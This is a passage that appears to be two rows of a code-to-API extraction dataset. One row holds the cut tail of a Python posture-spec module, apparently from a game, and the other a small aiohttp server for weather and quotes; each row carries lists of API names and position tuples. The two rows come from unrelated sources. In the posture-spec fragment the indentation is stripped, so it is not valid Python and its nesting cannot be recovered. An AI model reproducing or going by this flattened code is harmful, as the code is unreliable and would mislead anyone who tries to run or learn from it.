logger.error("Interaction {} has a slot_manifest_entry {} with a slot_child {} that doesn't appear to be a carry target or an interaction target. Please grab <NAME> and show this to him.", interaction,
slot_manifest_entry, slot_child, owner='tastle')
else:
variables_match(surface_target, slot_parent) or logger.error("One of the slotting requirements for this posture_state_spec has a target different from the posture manifest's surface target. This probably won't work: {} vs {} in {}", surface_target, slot_parent, posture_manifest_entry, owner='jpollak')
surface = PostureAspectSurface((slot_parent, slot_type, slot_target))
if slot_child_is_carryable:
carryable_surfaces.append((surface, slot_var_map))
else:
other_surfaces.append((surface, slot_var_map))
surface = None
first_list_with_surfaces = carryable_surfaces or other_surfaces
if first_list_with_surfaces:
surface, slot_var_map = first_list_with_surfaces.pop()
if carryable_surfaces:
logger.error('Multiple slot requirements for carryable targets, arbitrarily choosing one to manipulate in transition: {}', posture_manifest_entry, owner='jpollak')
other_surfaces.extend(carryable_surfaces)
var_map.update(slot_var_map)
if other_surfaces:
var_map[PostureSpecVariable.DESTINATION_FILTER] = functools.partial(self._destination_filter, other_surfaces)
elif surface_target == PostureSpecVariable.ANYTHING:
surface = None
else:
                if surface_target is None:
surface = PostureAspectSurface((None, None, None))
else:
surface = PostureAspectSurface((surface_target, None, None))
if not posture_manifest_entry.posture_types:
spec = PostureSpec((None, carry, surface))
yield (spec, frozendict(var_map))
continue
if posture_manifest_entry.specific:
posture_types = posture_manifest_entry.posture_types
else:
if posture_manifest_entry.family:
posture_types = [posture_type for posture_type in services.posture_manager().types.values() if posture_type.family_name == posture_manifest_entry.family]
else:
logger.error('Posture manifest entry has neither specific nor family.', owner='bhill')
continue
for posture_type in posture_types:
target_object_filters = [x.target_object_filter for x in self.posture_manifest if x.target_object_filter is not MATCH_ANY]
if target_object_filters:
body = PostureAspectBody((posture_type, PostureSpecVariable.BODY_TARGET_FILTERED))
var_map[PostureSpecVariable.BODY_TARGET_FILTERED] = tuple(target_object_filters)
else:
body = PostureAspectBody((posture_type, self.body_target))
spec = PostureSpec((body, carry, surface))
yield (spec, frozendict(var_map))
@staticmethod
def _destination_filter(surfaces_and_var_maps, dest_spec, var_map):
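        # Destination filter bound to the leftover (surface, slot_var_map) requirements: every
        # one of them must validate a TargetAlreadyInSlot operation against the combined var_map.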
for surface, slot_var_map in surfaces_and_var_maps:
combo_var_map = frozendict(var_map, slot_var_map)
if PostureSpecVariable.SURFACE_TARGET in combo_var_map:
surface = combo_var_map[PostureSpecVariable.SURFACE_TARGET]
else:
slot_child = combo_var_map[PostureSpecVariable.CARRY_TARGET]
surface = slot_child.parent
op = PostureOperation.TargetAlreadyInSlot(PostureSpecVariable.CARRY_TARGET, surface, PostureSpecVariable.SLOT)
if not op.validate(None, None, combo_var_map):
return False
return True
@property
def supported_postures(self):
return self.posture_manifest
@staticmethod
def _intersect_attr(this_constraint, other_constraint, attr_name, resolve_fn):
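        # Merges a single attribute of two specs: keeps whichever value is set and defers to
        # resolve_fn when both are set but differ. Returns an (early_out, value) pair; a
        # non-None early_out tells the caller to abort the intersection.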
value0 = getattr(this_constraint, attr_name)
value1 = getattr(other_constraint, attr_name)
if value0 is not None:
if value1 is not None:
if value0 != value1:
return resolve_fn(value0, value1)
            return (None, value0)
return (None, value1)
@staticmethod
def _intersect_attr_len(this_constraint, other_constraint, attr_name, resolve_fn):
value0 = getattr(this_constraint, attr_name)
value1 = getattr(other_constraint, attr_name)
if value0:
if value1:
if value0 != value1:
return resolve_fn(value0, value1)
            return (None, value0)
return (None, value1)
def intersection(self, other):
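        # Attribute-wise intersection of two posture state specs. The resolve helpers supply a
        # non-None early-out (e.g. False) when an attribute cannot be reconciled; otherwise a
        # merged PostureStateSpec is returned.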
early_out, posture_manifest = self._intersect_attr_len(self, other, 'posture_manifest', self._resolve_unequal_manifest)
if early_out is not None:
return early_out
early_out, slot_manifest = self._intersect_attr_len(self, other, 'slot_manifest', self._resolve_unequal_manifest)
if early_out is not None:
return early_out
early_out, body_target = self._intersect_attr(self, other, 'body_target', resolve_variables_and_objects)
if early_out is not None:
return early_out
return PostureStateSpec(posture_manifest, slot_manifest, body_target)
def _resolve_unequal_manifest(self, value0, value1):
result = value0.intersection(value1)
if result is not None:
            return (None, result)
return (False, None)
def references_object(self, obj):
posture_manifest, slot_manifest, body_target = self
for posture_manifest_entry in posture_manifest:
if posture_manifest_entry.references_object(obj):
return True
for slot_manifest_entry in slot_manifest:
if slot_manifest_entry.references_object(obj):
return True
if body_target is obj:
return True
return False
def is_filtered_target(self):
posture_manifest, *_ = self
for posture_manifest_entry in posture_manifest:
if posture_manifest_entry.target_object_filter is not MATCH_ANY:
return True
return False
def is_vehicle_only_spec(self):
if not self.posture_manifest:
return False
for posture_manifest_entry in self.posture_manifest:
for posture in posture_manifest_entry.posture_types:
if not posture.is_vehicle:
return False
        return True
def create_body_posture_state_spec(posture_manifest, body_target=PostureSpecVariable.ANYTHING):
return PostureStateSpec(posture_manifest, SlotManifest().intern(), body_target) | [
"postures.posture_specs.variables_match",
"postures.posture_specs.PostureSpec",
"collections.namedtuple",
"postures.posture_specs.PostureAspectBody",
"animation.posture_manifest.logger.error",
"sims4.collections.frozendict",
"postures.posture_specs.PostureOperation.TargetAlreadyInSlot",
"postures.post... | [((1193, 1282), 'collections.namedtuple', 'namedtuple', (['"""_PostureStateSpec"""', "('posture_manifest', 'slot_manifest', 'body_target')"], {}), "('_PostureStateSpec', ('posture_manifest', 'slot_manifest',\n 'body_target'))\n", (1203, 1282), False, 'from collections import namedtuple\n'), ((15391, 15424), 'sims4.collections.frozendict', 'frozendict', (['var_map', 'slot_var_map'], {}), '(var_map, slot_var_map)\n', (15401, 15424), False, 'from sims4.collections import frozendict\n'), ((15725, 15834), 'postures.posture_specs.PostureOperation.TargetAlreadyInSlot', 'PostureOperation.TargetAlreadyInSlot', (['PostureSpecVariable.CARRY_TARGET', 'surface', 'PostureSpecVariable.SLOT'], {}), '(PostureSpecVariable.CARRY_TARGET,\n surface, PostureSpecVariable.SLOT)\n', (15761, 15834), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((13942, 13977), 'postures.posture_specs.PostureSpec', 'PostureSpec', (['(None, carry, surface)'], {}), '((None, carry, surface))\n', (13953, 13977), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((15126, 15161), 'postures.posture_specs.PostureSpec', 'PostureSpec', (['(body, carry, surface)'], {}), '((body, carry, surface))\n', (15137, 15161), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((18952, 18966), 'animation.posture_manifest.SlotManifest', 'SlotManifest', ([], {}), '()\n', (18964, 18966), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((8028, 8132), 'postures.posture_specs.PostureAspectCarry', 'PostureAspectCarry', (['(PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, None, PostureSpecVariable.HAND\n )'], {}), '((PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, None,\n PostureSpecVariable.HAND))\n', (8046, 8132), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((14454, 14544), 'animation.posture_manifest.logger.error', 'logger.error', (['"""Posture manifest entry has neither specific nor family."""'], {'owner': '"""bhill"""'}), "('Posture manifest entry has neither specific nor family.',\n owner='bhill')\n", (14466, 14544), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((14825, 14900), 'postures.posture_specs.PostureAspectBody', 'PostureAspectBody', (['(posture_type, PostureSpecVariable.BODY_TARGET_FILTERED)'], {}), '((posture_type, PostureSpecVariable.BODY_TARGET_FILTERED))\n', (14842, 14900), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((15051, 15102), 'postures.posture_specs.PostureAspectBody', 'PostureAspectBody', (['(posture_type, self.body_target)'], {}), '((posture_type, self.body_target))\n', (15068, 15102), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), 
((8332, 8463), 'postures.posture_specs.PostureAspectCarry', 'PostureAspectCarry', (['(PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT, PostureSpecVariable.\n CARRY_TARGET, PostureSpecVariable.HAND)'], {}), '((PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT,\n PostureSpecVariable.CARRY_TARGET, PostureSpecVariable.HAND))\n', (8350, 8463), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((12492, 12551), 'postures.posture_specs.PostureAspectSurface', 'PostureAspectSurface', (['(slot_parent, slot_type, slot_target)'], {}), '((slot_parent, slot_type, slot_target))\n', (12512, 12551), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((13079, 13252), 'animation.posture_manifest.logger.error', 'logger.error', (['"""Multiple slot requirements for carryable targets, arbitrarily choosing one to manipulate in transition: {}"""', 'posture_manifest_entry'], {'owner': '"""jpollak"""'}), "(\n 'Multiple slot requirements for carryable targets, arbitrarily choosing one to manipulate in transition: {}'\n , posture_manifest_entry, owner='jpollak')\n", (13091, 13252), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((13471, 13530), 'functools.partial', 'functools.partial', (['self._destination_filter', 'other_surfaces'], {}), '(self._destination_filter, other_surfaces)\n', (13488, 13530), False, 'import functools\n'), ((13718, 13758), 'postures.posture_specs.PostureAspectSurface', 'PostureAspectSurface', (['(None, None, None)'], {}), '((None, None, None))\n', (13738, 13758), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((13811, 13861), 'postures.posture_specs.PostureAspectSurface', 'PostureAspectSurface', (['(surface_target, None, None)'], {}), '((surface_target, None, None))\n', (13831, 13861), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((14007, 14026), 'sims4.collections.frozendict', 'frozendict', (['var_map'], {}), '(var_map)\n', (14017, 14026), False, 'from sims4.collections import frozendict\n'), ((15191, 15210), 'sims4.collections.frozendict', 'frozendict', (['var_map'], {}), '(var_map)\n', (15201, 15210), False, 'from sims4.collections import frozendict\n'), ((12154, 12198), 'postures.posture_specs.variables_match', 'variables_match', (['surface_target', 'slot_parent'], {}), '(surface_target, slot_parent)\n', (12169, 12198), False, 'from postures.posture_specs import PostureSpecVariable, PostureSpec, PostureAspectBody, PostureAspectCarry, PostureAspectSurface, PostureOperation, variables_match\n'), ((12202, 12467), 'animation.posture_manifest.logger.error', 'logger.error', (['"""One of the slotting requirements for this posture_state_spec has a target different from the posture manifest\'s surface target. This probably won\'t work: {} vs {} in {}"""', 'surface_target', 'slot_parent', 'posture_manifest_entry'], {'owner': '"""jpollak"""'}), '(\n "One of the slotting requirements for this posture_state_spec has a target different from the posture manifest\'s surface target. 
This probably won\'t work: {} vs {} in {}"\n , surface_target, slot_parent, posture_manifest_entry, owner=\'jpollak\')\n', (12214, 12467), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((11807, 12067), 'animation.posture_manifest.logger.error', 'logger.error', (['"""Interaction {} has a slot_manifest_entry {} with a slot_child {} that doesn\'t appear to be a carry target or an interaction target. Please grab <NAME> and show this to him."""', 'interaction', 'slot_manifest_entry', 'slot_child'], {'owner': '"""tastle"""'}), '(\n "Interaction {} has a slot_manifest_entry {} with a slot_child {} that doesn\'t appear to be a carry target or an interaction target. Please grab <NAME> and show this to him."\n , interaction, slot_manifest_entry, slot_child, owner=\'tastle\')\n', (11819, 12067), False, 'from animation.posture_manifest import AnimationParticipant, resolve_variables_and_objects, logger, SlotManifest, MATCH_ANY, _NOT_SPECIFIC_ACTOR\n'), ((14308, 14334), 'services.posture_manager', 'services.posture_manager', ([], {}), '()\n', (14332, 14334), False, 'import services\n')] |
from aiohttp import web
import json
from weather_connector import WeatherConnector
from essentialdb import EssentialDB
import random
import jinja2
import aiohttp_jinja2
import os
import datetime
class MMRequestHandler:
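    # Request handler backed by an EssentialDB file: serves a cached weather view and a random
    # quote, each rendered through an aiohttp_jinja2 template.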
def __init__(self, db_path):
self.db_path = db_path
self._init_db()
def _init_db(self):
#first, see if already exists
if not os.path.isfile(self.db_path):
print("creating db...")
from quotes import initial_quotes
with EssentialDB(filepath=self.db_path) as db:
db.set("quotes", initial_quotes)
@aiohttp_jinja2.template('weather.html')
async def weather(self, request):
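        # Returns the stored weather, refreshing it through the module-level weather_connector
        # when it is missing or older than the configured update interval.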
with EssentialDB(filepath=self.db_path) as db:
weather = db.get("weather")
do_update = False
try:
delta = datetime.datetime.now() - weather["updated"]
if delta > datetime.timedelta(minutes=mm_config["weather"]["update_minutes"]):
do_update = True
except:
# probably not an error - just no weather update yet.
do_update = True
pass
if do_update:
new_weather = weather_connector.get_weather()
db.set("weather", new_weather)
weather = new_weather
return {'weather': weather}
@aiohttp_jinja2.template('quote.html')
async def quote(self, request):
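        # Renders a random quote from the stored quote list.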
with EssentialDB(filepath=self.db_path) as db:
quote = random.choice(db.get("quotes"))
return { 'quote': quote }
if __name__ == "__main__":
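    # Illustrative mm_config.json layout (keys inferred from the lookups below; values are placeholders):
    # {
    #   "weather": {"url": "...", "update_minutes": 30},
    #   "server": {"db_file": "mm.db"}
    # }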
with open('mm_config.json') as json_data_file:
mm_config = json.load(json_data_file)
weather_connector = WeatherConnector(mm_config["weather"]["url"])
db_file_path = mm_config["server"]["db_file"]
handler = MMRequestHandler(db_file_path)
app = web.Application()
app.router.add_get('/weather', handler.weather)
app.router.add_get('/quote', handler.quote)
app.router.add_static('/static', "static")
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader('templates'))
web.run_app(app)
| [
"aiohttp.web.run_app",
"weather_connector.WeatherConnector",
"aiohttp.web.Application",
"json.load",
"os.path.isfile",
"datetime.datetime.now",
"essentialdb.EssentialDB",
"aiohttp_jinja2.template",
"jinja2.FileSystemLoader",
"datetime.timedelta"
] | [((616, 655), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""weather.html"""'], {}), "('weather.html')\n", (639, 655), False, 'import aiohttp_jinja2\n'), ((1399, 1436), 'aiohttp_jinja2.template', 'aiohttp_jinja2.template', (['"""quote.html"""'], {}), "('quote.html')\n", (1422, 1436), False, 'import aiohttp_jinja2\n'), ((1766, 1811), 'weather_connector.WeatherConnector', 'WeatherConnector', (["mm_config['weather']['url']"], {}), "(mm_config['weather']['url'])\n", (1782, 1811), False, 'from weather_connector import WeatherConnector\n'), ((1919, 1936), 'aiohttp.web.Application', 'web.Application', ([], {}), '()\n', (1934, 1936), False, 'from aiohttp import web\n'), ((2164, 2180), 'aiohttp.web.run_app', 'web.run_app', (['app'], {}), '(app)\n', (2175, 2180), False, 'from aiohttp import web\n'), ((1715, 1740), 'json.load', 'json.load', (['json_data_file'], {}), '(json_data_file)\n', (1724, 1740), False, 'import json\n'), ((388, 416), 'os.path.isfile', 'os.path.isfile', (['self.db_path'], {}), '(self.db_path)\n', (402, 416), False, 'import os\n'), ((707, 741), 'essentialdb.EssentialDB', 'EssentialDB', ([], {'filepath': 'self.db_path'}), '(filepath=self.db_path)\n', (718, 741), False, 'from essentialdb import EssentialDB\n'), ((1486, 1520), 'essentialdb.EssentialDB', 'EssentialDB', ([], {'filepath': 'self.db_path'}), '(filepath=self.db_path)\n', (1497, 1520), False, 'from essentialdb import EssentialDB\n'), ((2122, 2158), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['"""templates"""'], {}), "('templates')\n", (2145, 2158), False, 'import jinja2\n'), ((518, 552), 'essentialdb.EssentialDB', 'EssentialDB', ([], {'filepath': 'self.db_path'}), '(filepath=self.db_path)\n', (529, 552), False, 'from essentialdb import EssentialDB\n'), ((861, 884), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (882, 884), False, 'import datetime\n'), ((933, 999), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': "mm_config['weather']['update_minutes']"}), "(minutes=mm_config['weather']['update_minutes'])\n", (951, 999), False, 'import datetime\n')] |